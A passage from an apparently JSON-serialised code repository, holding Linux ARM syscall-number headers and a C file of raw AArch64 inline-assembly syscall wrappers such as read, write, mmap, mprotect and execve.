__NR_set_mempolicy\t\t(__NR_SYSCALL_BASE+321)\n#define __NR_openat\t\t\t(__NR_SYSCALL_BASE+322)\n#define __NR_mkdirat\t\t\t(__NR_SYSCALL_BASE+323)\n#define __NR_mknodat\t\t\t(__NR_SYSCALL_BASE+324)\n#define __NR_fchownat\t\t\t(__NR_SYSCALL_BASE+325)\n#define __NR_futimesat\t\t\t(__NR_SYSCALL_BASE+326)\n#define __NR_fstatat64\t\t\t(__NR_SYSCALL_BASE+327)\n#define __NR_unlinkat\t\t\t(__NR_SYSCALL_BASE+328)\n#define __NR_renameat\t\t\t(__NR_SYSCALL_BASE+329)\n#define __NR_linkat\t\t\t(__NR_SYSCALL_BASE+330)\n#define __NR_symlinkat\t\t\t(__NR_SYSCALL_BASE+331)\n#define __NR_readlinkat\t\t\t(__NR_SYSCALL_BASE+332)\n#define __NR_fchmodat\t\t\t(__NR_SYSCALL_BASE+333)\n#define __NR_faccessat\t\t\t(__NR_SYSCALL_BASE+334)\n#define __NR_pselect6\t\t\t(__NR_SYSCALL_BASE+335)\n#define __NR_ppoll\t\t\t(__NR_SYSCALL_BASE+336)\n#define __NR_unshare\t\t\t(__NR_SYSCALL_BASE+337)\n#define __NR_set_robust_list\t\t(__NR_SYSCALL_BASE+338)\n#define __NR_get_robust_list\t\t(__NR_SYSCALL_BASE+339)\n#define __NR_splice\t\t\t(__NR_SYSCALL_BASE+340)\n#define __NR_arm_sync_file_range\t(__NR_SYSCALL_BASE+341)\n#define __NR_sync_file_range2\t\t__NR_arm_sync_file_range\n#define __NR_tee\t\t\t(__NR_SYSCALL_BASE+342)\n#define __NR_vmsplice\t\t\t(__NR_SYSCALL_BASE+343)\n#define __NR_move_pages\t\t\t(__NR_SYSCALL_BASE+344)\n#define __NR_getcpu\t\t\t(__NR_SYSCALL_BASE+345)\n#define __NR_epoll_pwait\t\t(__NR_SYSCALL_BASE+346)\n#define __NR_kexec_load\t\t\t(__NR_SYSCALL_BASE+347)\n#define __NR_utimensat\t\t\t(__NR_SYSCALL_BASE+348)\n#define __NR_signalfd\t\t\t(__NR_SYSCALL_BASE+349)\n#define __NR_timerfd_create\t\t(__NR_SYSCALL_BASE+350)\n#define __NR_eventfd\t\t\t(__NR_SYSCALL_BASE+351)\n#define __NR_fallocate\t\t\t(__NR_SYSCALL_BASE+352)\n#define __NR_timerfd_settime\t\t(__NR_SYSCALL_BASE+353)\n#define __NR_timerfd_gettime\t\t(__NR_SYSCALL_BASE+354)\n#define __NR_signalfd4\t\t\t(__NR_SYSCALL_BASE+355)\n#define __NR_eventfd2\t\t\t(__NR_SYSCALL_BASE+356)\n#define __NR_epoll_create1\t\t(__NR_SYSCALL_BASE+357)\n#define __NR_dup3\t\t\t(__NR_SYSCALL_BASE+358)\n#define __NR_pipe2\t\t\t(__NR_SYSCALL_BASE+359)\n#define __NR_inotify_init1\t\t(__NR_SYSCALL_BASE+360)\n#define __NR_preadv\t\t\t(__NR_SYSCALL_BASE+361)\n#define __NR_pwritev\t\t\t(__NR_SYSCALL_BASE+362)\n#define __NR_rt_tgsigqueueinfo\t\t(__NR_SYSCALL_BASE+363)\n#define __NR_perf_event_open\t\t(__NR_SYSCALL_BASE+364)\n#define __NR_recvmmsg\t\t\t(__NR_SYSCALL_BASE+365)\n#define __NR_accept4\t\t\t(__NR_SYSCALL_BASE+366)\n#define __NR_fanotify_init\t\t(__NR_SYSCALL_BASE+367)\n#define __NR_fanotify_mark\t\t(__NR_SYSCALL_BASE+368)\n#define __NR_prlimit64\t\t\t(__NR_SYSCALL_BASE+369)\n#define __NR_name_to_handle_at\t\t(__NR_SYSCALL_BASE+370)\n#define __NR_open_by_handle_at\t\t(__NR_SYSCALL_BASE+371)\n#define __NR_clock_adjtime\t\t(__NR_SYSCALL_BASE+372)\n#define __NR_syncfs\t\t\t(__NR_SYSCALL_BASE+373)\n#define __NR_sendmmsg\t\t\t(__NR_SYSCALL_BASE+374)\n#define __NR_setns\t\t\t(__NR_SYSCALL_BASE+375)\n#define __NR_process_vm_readv\t\t(__NR_SYSCALL_BASE+376)\n#define __NR_process_vm_writev\t\t(__NR_SYSCALL_BASE+377)\n#define __NR_kcmp\t\t\t(__NR_SYSCALL_BASE+378)\n#define __NR_finit_module\t\t(__NR_SYSCALL_BASE+379)\n#define __NR_sched_setattr\t\t(__NR_SYSCALL_BASE+380)\n#define __NR_sched_getattr\t\t(__NR_SYSCALL_BASE+381)\n#define __NR_renameat2\t\t\t(__NR_SYSCALL_BASE+382)\n#define __NR_memfd_create\t\t(__NR_SYSCALL_BASE+385)\n\n/*\n * The following SWIs are ARM private.\n */\n#define __ARM_NR_BASE\t\t\t(__NR_SYSCALL_BASE+0x0f0000)\n#define __ARM_NR_breakpoint\t\t(__ARM_NR_BASE+1)\n#define __ARM_NR_cacheflush\t\t(__ARM_NR_BASE+2)\n#define __ARM_NR_usr26\t\t\t(__ARM_NR_BASE+3)\n#define __ARM_NR_usr32\t\t\t(__ARM_NR_BASE+4)\n#define __ARM_NR_set_tls\t\t(__ARM_NR_BASE+5)\n\n/*\n * The following syscalls are obsolete and no longer available for EABI.\n */\n#if defined(__ARM_EABI__)\n#undef __NR_time\n#undef __NR_umount\n#undef __NR_stime\n#undef __NR_alarm\n#undef __NR_utime\n#undef __NR_getrlimit\n#undef __NR_select\n#undef __NR_readdir\n#undef __NR_mmap\n#undef __NR_socketcall\n#undef __NR_syscall\n#undef __NR_ipc\n#endif\n\n#endif /* _SYMB__ASM_ARM_UNISTD_H */\n" }, { "path": "stage2/syscall_arm_64.c", "content": "#include \"syscall_arm_64.h\"\n#include \"linuxdefs.h\"\n\nssize_t _read(int fd, void *buf, size_t size)\n{\n ssize_t ret;\n register long x0 asm (\"x0\") = (long)fd;\n register long x1 asm (\"x1\") = (long)buf;\n register long x2 asm (\"x2\") = (long)size;\n register long x8 asm (\"x8\") = __NR_read;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n\nssize_t _write(int fd, const void *buf, size_t size)\n{\n ssize_t ret;\n register long x0 asm (\"x0\") = (long)fd;\n register long x1 asm (\"x1\") = (long)buf;\n register long x2 asm (\"x2\") = (long)size;\n register long x8 asm (\"x8\") = __NR_write;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n\nint _open(char * path, int mode, int flags)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)path;\n register long x1 asm (\"x1\") = (long)mode;\n register long x2 asm (\"x2\") = (long)flags;\n register long x8 asm (\"x8\") = __NR_open;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n\nint _close(int fd)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)fd;\n register long x8 asm (\"x8\") = __NR_close;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0)\n );\n return ret;\n}\n\nlong _lseek(int fd, long offset, int whence)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)fd;\n register long x1 asm (\"x1\") = (long)offset;\n register long x2 asm (\"x2\") = (long)whence;\n register long x8 asm (\"x8\") = __NR_lseek;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n\nvoid * _mmap(void * start, long length, int prot, int flags, int fd, long offset)\n{\n void * ret;\n register long x0 asm (\"x0\") = (long)start;\n register long x1 asm (\"x1\") = (long)length;\n register long x2 asm (\"x2\") = (long)prot;\n register long x3 asm (\"x3\") = (long)flags;\n register long x4 asm (\"x4\") = (long)fd;\n register long x5 asm (\"x5\") = (long)offset;\n register long x8 asm (\"x8\") = __NR_mmap;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2), \"r\"(x3), \"r\"(x4), \"r\"(x5)\n );\n return ret;\n}\n\nlong _mprotect(void * addr, long len, int prot)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)addr;\n register long x1 asm (\"x1\") = (long)len;\n register long x2 asm (\"x2\") = (long)prot;\n register long x8 asm (\"x8\") = __NR_mprotect;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n\nlong _munmap(char * start, int length)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)start;\n register long x1 asm (\"x1\") = (long)length;\n register long x8 asm (\"x8\") = __NR_munmap;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1)\n );\n return ret;\n}\n\nlong _brk(unsigned long addr)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)addr;\n register long x8 asm (\"x8\") = __NR_brk;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0)\n );\n return ret;\n}\n\nint _exit(int level)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)level;\n register long x8 asm (\"x8\") = __NR_exit;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0)\n );\n return ret;\n}\n\nvoid raise(void)\n{\n _exit(-1);\n}\n\nlong _execve(char * filename, char ** argv, char ** envp)\n{\n long ret;\n register long x0 asm (\"x0\") = (long)filename;\n register long x1 asm (\"x1\") = (long)argv;\n register long x2 asm (\"x2\") = (long)envp;\n register long x8 asm (\"x8\") = __NR_execve;\n\n asm volatile\n (\n \"svc #0; mov %0, x0\"\n : \"=r\" (ret)\n : \"r\"(x8), \"r\"(x0), \"r\"(x1), \"r\"(x2)\n );\n return ret;\n}\n" }, { "path": "stage2/syscall_arm_64.h", "content": "#include \n\n/*\n * This file contains the system call numbers, based on the\n * layout of the x86-64 architecture, which embeds the\n * pointer to the syscall in the table.\n *\n * As a basic principle, no duplication of functionality\n * should be added, e.g. we don't use lseek when llseek\n * is present. New architectures should use this file\n * and implement the less feature-full calls in user space.\n */\n\n#ifndef __SYSCALL\n#define __SYSCALL(x, y)\n#endif\n\n#if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)\n#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32)\n#else\n#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _64)\n#endif\n\n#ifdef __SYSCALL_COMPAT\n#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _comp)\n#define __SC_COMP_3264(_nr, _32, _64, _comp) __SYSCALL(_nr, _comp)\n#else\n#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _sys)\n#define __SC_COMP_3264(_nr, _32, _64, _comp) __SC_3264(_nr, _32, _64)\n#endif\n\n#define __NR_io_setup 0\n__SC_COMP(__NR_io_setup, sys_io_setup, compat_sys_io_setup)\n#define __NR_io_destroy 1\n__SYSCALL(__NR_io_destroy, sys_io_destroy)\n#define __NR_io_submit 2\n__SC_COMP(__NR_io_submit, sys_io_submit, compat_sys_io_submit)\n#define __NR_io_cancel 3\n__SYSCALL(__NR_io_cancel, sys_io_cancel)\n#define __NR_io_getevents 4\n__SC_COMP(__NR_io_getevents, sys_io_getevents, compat_sys_io_getevents)\n\n/* fs/xattr.c */\n#define __NR_setxattr 5\n__SYSCALL(__NR_setxattr, sys_setxattr)\n#define __NR_lsetxattr 6\n__SYSCALL(__NR_lsetxattr, sys_lsetxattr)\n#define __NR_fsetxattr 7\n__SYSCALL(__NR_fsetxattr, sys_fsetxattr)\n#define __NR_getxattr 8\n__SYSCALL(__NR_getxattr, sys_getxattr)\n#define __NR_lgetxattr 9\n__SYSCALL(__NR_lgetxattr, sys_lgetxattr)\n#define __NR_fgetxattr 10\n__SYSCALL(__NR_fgetxattr, sys_fgetxattr)\n#define __NR_listxattr 11\n__SYSCALL(__NR_listxattr, sys_listxattr)\n#define __NR_llistxattr 12\n__SYSCALL(__NR_llistxattr, sys_llistxattr)\n#define __NR_flistxattr 13\n__SYSCALL(__NR_flistxattr, sys_flistxattr)\n#define __NR_removexattr 14\n__SYSCALL(__NR_removexattr, sys_removexattr)\n#define __NR_lremovexattr 15\n__SYSCALL(__NR_lremovexattr, sys_lremovexattr)\n#define __NR_fremovexattr 16\n__SYSCALL(__NR_fremovexattr, sys_fremovexattr)\n\n/* fs/dcache.c */\n#define __NR_getcwd 17\n__SYSCALL(__NR_getcwd, sys_getcwd)\n\n/* fs/cookies.c */\n#define __NR_lookup_dcookie 18\n__SC_COMP(__NR_lookup_dcookie, sys_lookup_dcookie, compat_sys_lookup_dcookie)\n\n/* fs/eventfd.c */\n#define __NR_eventfd2 19\n__SYSCALL(__NR_eventfd2, sys_eventfd2)\n\n/* fs/eventpoll.c */\n#define __NR_epoll_create1 20\n__SYSCALL(__NR_epoll_create1, sys_epoll_create1)\n#define __NR_epoll_ctl 21\n__SYSCALL(__NR_epoll_ctl, sys_epoll_ctl)\n#define __NR_epoll_pwait 22\n__SC_COMP(__NR_epoll_pwait, sys_epoll_pwait, compat_sys_epoll_pwait)\n\n/* fs/fcntl.c */\n#define __NR_dup 23\n__SYSCALL(__NR_dup, sys_dup)\n#define __NR_dup3 24\n__SYSCALL(__NR_dup3, sys_dup3)\n#define __NR3264_fcntl 25\n__SC_COMP_3264(__NR3264_fcntl, sys_fcntl64, sys_fcntl, compat_sys_fcntl64)\n\n/* fs/inotify_user.c */\n#define __NR_inotify_init1 26\n__SYSCALL(__NR_inotify_init1, sys_inotify_init1)\n#define __NR_inotify_add_watch 27\n__SYSCALL(__NR_inotify_add_watch, sys_inotify_add_watch)\n#define __NR_inotify_rm_watch 28\n__SYSCALL(__NR_inotify_rm_watch, sys_inotify_rm_watch)\n\n/* fs/ioctl.c */\n#define __NR_ioctl 29\n__SC_COMP(__NR_ioctl, sys_ioctl, compat_sys_ioctl)\n\n/* fs/ioprio.c */\n#define __NR_ioprio_set 30\n__SYSCALL(__NR_ioprio_set, sys_ioprio_set)\n#define __NR_ioprio_get 31\n__SYSCALL(__NR_ioprio_get, sys_ioprio_get)\n\n/* fs/locks.c */\n#define __NR_flock 32\n__SYSCALL(__NR_flock, sys_flock)\n\n/* fs/namei.c */\n#define __NR_mknodat 33\n__SYSCALL(__NR_mknodat, sys_mknodat)\n#define __NR_mkdirat 34\n__SYSCALL(__NR_mkdirat, sys_mkdirat)\n#define __NR_unlinkat 35\n__SYSCALL(__NR_unlinkat, sys_unlinkat)\n#define __NR_symlinkat 36\n__SYSCALL(__NR_symlinkat, sys_symlinkat)\n#define __NR_linkat 37\n__SYSCALL(__NR_linkat, sys_linkat)\n#define __NR_renameat 38\n__SYSCALL(__NR_renameat, sys_renameat)\n\n/* fs/namespace.c */\n#define __NR_umount2 39\n__SYSCALL(__NR_umount2, sys_umount)\n#define __NR_mount 40\n__SC_COMP(__NR_mount, sys_mount, compat_sys_mount)\n#define __NR_pivot_root 41\n__SYSCALL(__NR_pivot_root, sys_pivot_root)\n\n/* fs/nfsctl.c */\n#define __NR_nfsservctl 42\n__SYSCALL(__NR_nfsservctl, sys_ni_syscall)\n\n/* fs/open.c */\n#define __NR3264_statfs 43\n__SC_COMP_3264(__NR3264_statfs, sys_statfs64, sys_statfs, \\\n\t compat_sys_statfs64)\n#define __NR3264_fstatfs 44\n__SC_COMP_3264(__NR3264_fstatfs, sys_fstatfs64, sys_fstatfs, \\\n\t compat_sys_fstatfs64)\n#define __NR3264_truncate 45\n__SC_COMP_3264(__NR3264_truncate, sys_truncate64, sys_truncate, \\\n\t compat_sys_truncate64)\n#define __NR3264_ftruncate 46\n__SC_COMP_3264(__NR3264_ftruncate, sys_ftruncate64, sys_ftruncate, \\\n\t compat_sys_ftruncate64)\n\n#define __NR_fallocate 47\n__SC_COMP(__NR_fallocate, sys_fallocate, compat_sys_fallocate)\n#define __NR_faccessat 48\n__SYSCALL(__NR_faccessat, sys_faccessat)\n#define __NR_chdir 49\n__SYSCALL(__NR_chdir, sys_chdir)\n#define __NR_fchdir 50\n__SYSCALL(__NR_fchdir, sys_fchdir)\n#define __NR_chroot 51\n__SYSCALL(__NR_chroot, sys_chroot)\n#define __NR_fchmod 52\n__SYSCALL(__NR_fchmod, sys_fchmod)\n#define __NR_fchmodat 53\n__SYSCALL(__NR_fchmodat, sys_fchmodat)\n#define __NR_fchownat 54\n__SYSCALL(__NR_fchownat, sys_fchownat)\n#define __NR_fchown 55\n__SYSCALL(__NR_fchown, sys_fchown)\n#define __NR_openat 56\n__SC_COMP(__NR_openat, sys_openat, compat_sys_openat)\n#define __NR_close 57\n__SYSCALL(__NR_close, sys_close)\n#define __NR_vhangup 58\n__SYSCALL(__NR_vhangup, sys_vhangup)\n\n/* fs/pipe.c */\n#define __NR_pipe2 59\n__SYSCALL(__NR_pipe2, sys_pipe2)\n\n/* fs/quota.c */\n#define __NR_quotactl 60\n__SYSCALL(__NR_quotactl, sys_quotactl)\n\n/* fs/readdir.c */\n#define __NR_getdents64 61\n#define __ARCH_WANT_COMPAT_SYS_GETDENTS64\n__SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64)\n\n/* fs/read_write.c */\n#define __NR3264_lseek 62\n__SC_3264(__NR3264_lseek, sys_llseek, sys_lseek)\n#define __NR_read 63\n__SYSCALL(__NR_read, sys_read)\n#define __NR_write 64\n__SYSCALL(__NR_write, sys_write)\n#define __NR_readv 65\n__SC_COMP(__NR_readv, sys_readv, compat_sys_readv)\n#define __NR_writev 66\n__SC_COMP(__NR_writev, sys_writev, compat_sys_writev)\n#define __NR_pread64 67\n__SC_COMP(__NR_pread64, sys_pread64, compat_sys_pread64)\n#define __NR_pwrite64 68\n__SC_COMP(__NR_pwrite64, sys_pwrite64, compat_sys_pwrite64)\n#define __NR_preadv 69\n__SC_COMP(__NR_preadv, sys_preadv, compat_sys_preadv)\n#define __NR_pwritev 70\n__SC_COMP(__NR_pwritev, sys_pwritev, compat_sys_pwritev)\n\n/* fs/sendfile.c */\n#define __NR3264_sendfile 71\n__SYSCALL(__NR3264_sendfile, sys_sendfile64)\n\n/* fs/select.c */\n#define __NR_pselect6 72\n__SC_COMP(__NR_pselect6, sys_pselect6, compat_sys_pselect6)\n#define __NR_ppoll 73\n__SC_COMP(__NR_ppoll, sys_ppoll, compat_sys_ppoll)\n\n/* fs/signalfd.c */\n#define __NR_signalfd4 74\n__SC_COMP(__NR_signalfd4, sys_signalfd4, compat_sys_signalfd4)\n\n/* fs/splice.c */\n#define __NR_vmsplice 75\n__SC_COMP(__NR_vmsplice, sys_vmsplice, compat_sys_vmsplice)\n#define __NR_splice 76\n__SYSCALL(__NR_splice, sys_splice)\n#define __NR_tee 77\n__SYSCALL(__NR_tee, sys_tee)\n\n/* fs/stat.c */\n#define __NR_readlinkat 78\n__SYSCALL(__NR_readlinkat, sys_readlinkat)\n#define __NR3264_fstatat 79\n__SC_3264(__NR3264_fstatat, sys_fstatat64, sys_newfstatat)\n#define __NR3264_fstat 80\n__SC_3264(__NR3264_fstat, sys_fstat64, sys_newfstat)\n\n/* fs/sync.c */\n#define __NR_sync 81\n__SYSCALL(__NR_sync, sys_sync)\n#define __NR_fsync 82\n__SYSCALL(__NR_fsync, sys_fsync)\n#define __NR_fdatasync 83\n__SYSCALL(__NR_fdatasync, sys_fdatasync)\n#ifdef __ARCH_WANT_SYNC_FILE_RANGE2\n#define __NR_sync_file_range2 84\n__SC_COMP(__NR_sync_file_range2, sys_sync_file_range2, \\\n\t compat_sys_sync_file_range2)\n#else\n#define __NR_sync_file_range 84\n__SC_COMP(__NR_sync_file_range, sys_sync_file_range, \\\n\t compat_sys_sync_file_range)\n#endif\n\n/* fs/timerfd.c */\n#define __NR_timerfd_create 85\n__SYSCALL(__NR_timerfd_create, sys_timerfd_create)\n#define __NR_timerfd_settime 86\n__SC_COMP(__NR_timerfd_settime, sys_timerfd_settime, \\\n\t compat_sys_timerfd_settime)\n#define __NR_timerfd_gettime 87\n__SC_COMP(__NR_timerfd_gettime, sys_timerfd_gettime, \\\n\t compat_sys_timerfd_gettime)\n\n/* fs/utimes.c */\n#define __NR_utimensat 88\n__SC_COMP(__NR_utimensat, sys_utimensat, compat_sys_utimensat)\n\n/* kernel/acct.c */\n#define __NR_acct 89\n__SYSCALL(__NR_acct, sys_acct)\n\n/* kernel/capability.c */\n#define __NR_capget 90\n__SYSCALL(__NR_capget, sys_capget)\n#define __NR_capset 91\n__SYSCALL(__NR_capset, sys_capset)\n\n/* kernel/exec_domain.c */\n#define __NR_personality 92\n__SYSCALL(__NR_personality, sys_personality)\n\n/* kernel/exit.c */\n#define __NR_exit 93\n__SYSCALL(__NR_exit, sys_exit)\n#define __NR_exit_group 94\n__SYSCALL(__NR_exit_group, sys_exit_group)\n#define __NR_waitid 95\n__SC_COMP(__NR_waitid, sys_waitid, compat_sys_waitid)\n\n/* kernel/fork.c */\n#define __NR_set_tid_address 96\n__SYSCALL(__NR_set_tid_address, sys_set_tid_address)\n#define __NR_unshare 97\n__SYSCALL(__NR_unshare, sys_unshare)\n\n/* kernel/futex.c */\n#define __NR_futex 98\n__SC_COMP(__NR_futex, sys_futex, compat_sys_futex)\n#define __NR_set_robust_list 99\n__SC_COMP(__NR_set_robust_list, sys_set_robust_list, \\\n\t compat_sys_set_robust_list)\n#define __NR_get_robust_list 100\n__SC_COMP(__NR_get_robust_list, sys_get_robust_list, \\\n\t compat_sys_get_robust_list)\n\n/* kernel/hrtimer.c */\n#define __NR_nanosleep 101\n__SC_COMP(__NR_nanosleep, sys_nanosleep, compat_sys_nanosleep)\n\n/* kernel/itimer.c */\n#define __NR_getitimer 102\n__SC_COMP(__NR_getitimer, sys_getitimer, compat_sys_getitimer)\n#define __NR_setitimer 103\n__SC_COMP(__NR_setitimer, sys_setitimer, compat_sys_setitimer)\n\n/* kernel/kexec.c */\n#define __NR_kexec_load 104\n__SC_COMP(__NR_kexec_load, sys_kexec_load, compat_sys_kexec_load)\n\n/* kernel/module.c */\n#define __NR_init_module 105\n__SYSCALL(__NR_init_module, sys_init_module)\n#define __NR_delete_module 106\n__SYSCALL(__NR_delete_module, sys_delete_module)\n\n/* kernel/posix-timers.c */\n#define __NR_timer_create 107\n__SC_COMP(__NR_timer_create, sys_timer_create, compat_sys_timer_create)\n#define __NR_timer_gettime 108\n__SC_COMP(__NR_timer_gettime, sys_timer_gettime, compat_sys_timer_gettime)\n#define __NR_timer_getoverrun 109\n__SYSCALL(__NR_timer_getoverrun, sys_timer_getoverrun)\n#define __NR_timer_settime 110\n__SC_COMP(__NR_timer_settime, sys_timer_settime, compat_sys_timer_settime)\n#define __NR_timer_delete 111\n__SYSCALL(__NR_timer_delete, sys_timer_delete)\n#define __NR_clock_settime 112\n__SC_COMP(__NR_clock_settime, sys_clock_settime, compat_sys_clock_settime)\n#define __NR_clock_gettime 113\n__SC_COMP(__NR_clock_gettime, sys_clock_gettime, compat_sys_clock_gettime)\n#define __NR_clock_getres 114\n__SC_COMP(__NR_clock_getres, sys_clock_getres, compat_sys_clock_getres)\n#define __NR_clock_nanosleep 115\n__SC_COMP(__NR_clock_nanosleep, sys_clock_nanosleep, \\\n\t compat_sys_clock_nanosleep)\n\n/* kernel/printk.c */\n#define __NR_syslog 116\n__SYSCALL(__NR_syslog, sys_syslog)\n\n/* kernel/ptrace.c */\n#define __NR_ptrace 117\n__SYSCALL(__NR_ptrace, sys_ptrace)\n\n/* kernel/sched/core.c */\n#define __NR_sched_setparam 118\n__SYSCALL(__NR_sched_setparam, sys_sched_setparam)\n#define __NR_sched_setscheduler 119\n__SYSCALL(__NR_sched_setscheduler, sys_sched_setscheduler)\n#define __NR_sched_getscheduler 120\n__SYSCALL(__NR_sched_getscheduler, sys_sched_getscheduler)\n#define __NR_sched_getparam 121\n__SYSCALL(__NR_sched_getparam, sys_sched_getparam)\n#define __NR_sched_setaffinity 122\n__SC_COMP(__NR_sched_setaffinity, sys_sched_setaffinity, \\\n\t compat_sys_sched_setaffinity)\n#define __NR_sched_getaffinity 123\n__SC_COMP(__NR_sched_getaffinity, sys_sched_getaffinity, \\\n\t compat_sys_sched_getaffinity)\n#define __NR_sched_yield 124\n__SYSCALL(__NR_sched_yield, sys_sched_yield)\n#define __NR_sched_get_priority_max 125\n__SYSCALL(__NR_sched_get_priority_max, sys_sched_get_priority_max)\n#define __NR_sched_get_priority_min 126\n__SYSCALL(__NR_sched_get_priority_min, sys_sched_get_priority_min)\n#define __NR_sched_rr_get_interval 127\n__SC_COMP(__NR_sched_rr_get_interval, sys_sched_rr_get_interval, \\\n\t compat_sys_sched_rr_get_interval)\n\n/* kernel/signal.c */\n#define __NR_restart_syscall 128\n__SYSCALL(__NR_restart_syscall, sys_restart_syscall)\n#define __NR_kill 129\n__SYSCALL(__NR_kill, sys_kill)\n#define __NR_tkill 130\n__SYSCALL(__NR_tkill, sys_tkill)\n#define __NR_tgkill 131\n__SYSCALL(__NR_tgkill, sys_tgkill)\n#define __NR_sigaltstack 132\n__SC_COMP(__NR_sigaltstack, sys_sigaltstack, compat_sys_sigaltstack)\n#define __NR_rt_sigsuspend 133\n__SC_COMP(__NR_rt_sigsuspend, sys_rt_sigsuspend, compat_sys_rt_sigsuspend)\n#define __NR_rt_sigaction 134\n__SC_COMP(__NR_rt_sigaction, sys_rt_sigaction, compat_sys_rt_sigaction)\n#define __NR_rt_sigprocmask 135\n__SC_COMP(__NR_rt_sigprocmask, sys_rt_sigprocmask, compat_sys_rt_sigprocmask)\n#define __NR_rt_sigpending 136\n__SC_COMP(__NR_rt_sigpending, sys_rt_sigpending, compat_sys_rt_sigpending)\n#define __NR_rt_sigtimedwait 137\n__SC_COMP(__NR_rt_sigtimedwait, sys_rt_sigtimedwait, \\\n\t compat_sys_rt_sigtimedwait)\n#define __NR_rt_sigqueueinfo 138\n__SC_COMP(__NR_rt_sigqueueinfo, sys_rt_sigqueueinfo, \\\n\t compat_sys_rt_sigqueueinfo)\n#define __NR_rt_sigreturn 139\n__SC_COMP(__NR_rt_sigreturn, sys_rt_sigreturn, compat_sys_rt_sigreturn)\n\n/* kernel/sys.c */\n#define __NR_setpriority 140\n__SYSCALL(__NR_setpriority, sys_setpriority)\n#define __NR_getpriority 141\n__SYSCALL(__NR_getpriority, sys_getpriority)\n#define __NR_reboot 142\n__SYSCALL(__NR_reboot, sys_reboot)\n#define __NR_setregid 143\n__SYSCALL(__NR_setregid, sys_setregid)\n#define __NR_setgid 144\n__SYSCALL(__NR_setgid, sys_setgid)\n#define __NR_setreuid 145\n__SYSCALL(__NR_setreuid, sys_setreuid)\n#define __NR_setuid 146\n__SYSCALL(__NR_setuid, sys_setuid)\n#define __NR_setresuid 147\n__SYSCALL(__NR_setresuid, sys_setresuid)\n#define __NR_getresuid 148\n__SYSCALL(__NR_getresuid, sys_getresuid)\n#define __NR_setresgid 149\n__SYSCALL(__NR_setresgid, sys_setresgid)\n#define __NR_getresgid 150\n__SYSCALL(__NR_getresgid, sys_getresgid)\n#define __NR_setfsuid 151\n__SYSCALL(__NR_setfsuid, sys_setfsuid)\n#define __NR_setfsgid 152\n__SYSCALL(__NR_setfsgid, sys_setfsgid)\n#define __NR_times 153\n__SC_COMP(__NR_times, sys_times, compat_sys_times)\n#define __NR_setpgid 154\n__SYSCALL(__NR_setpgid, sys_setpgid)\n#define __NR_getpgid 155\n__SYSCALL(__NR_getpgid, sys_getpgid)\n#define __NR_getsid 156\n__SYSCALL(__NR_getsid, sys_getsid)\n#define __NR_setsid 157\n__SYSCALL(__NR_setsid, sys_setsid)\n#define __NR_getgroups 158\n__SYSCALL(__NR_getgroups, sys_getgroups)\n#define __NR_setgroups 159\n__SYSCALL(__NR_setgroups, sys_setgroups)\n#define __NR_uname 160\n__SYSCALL(__NR_uname, sys_newuname)\n#define __NR_sethostname 161\n__SYSCALL(__NR_sethostname, sys_sethostname)\n#define __NR_setdomainname 162\n__SYSCALL(__NR_setdomainname, sys_setdomainname)\n#define __NR_getrlimit 163\n__SC_COMP(__NR_getrlimit, sys_getrlimit, compat_sys_getrlimit)\n#define __NR_setrlimit 164\n__SC_COMP(__NR_setrlimit, sys_setrlimit, compat_sys_setrlimit)\n#define __NR_getrusage 165\n__SC_COMP(__NR_getrusage, sys_getrusage, compat_sys_getrusage)\n#define __NR_umask 166\n__SYSCALL(__NR_umask, sys_umask)\n#define __NR_prctl 167\n__SYSCALL(__NR_prctl, sys_prctl)\n#define __NR_getcpu 168\n__SYSCALL(__NR_getcpu, sys_getcpu)\n\n/* kernel/time.c */\n#define __NR_gettimeofday 169\n__SC_COMP(__NR_gettimeofday, sys_gettimeofday, compat_sys_gettimeofday)\n#define __NR_settimeofday 170\n__SC_COMP(__NR_settimeofday, sys_settimeofday, compat_sys_settimeofday)\n#define __NR_adjtimex 171\n__SC_COMP(__NR_adjtimex, sys_adjtimex, compat_sys_adjtimex)\n\n/* kernel/timer.c */\n#define __NR_getpid 172\n__SYSCALL(__NR_getpid, sys_getpid)\n#define __NR_getppid 173\n__SYSCALL(__NR_getppid, sys_getppid)\n#define __NR_getuid 174\n__SYSCALL(__NR_getuid, sys_getuid)\n#define __NR_geteuid 175\n__SYSCALL(__NR_geteuid, sys_geteuid)\n#define __NR_getgid 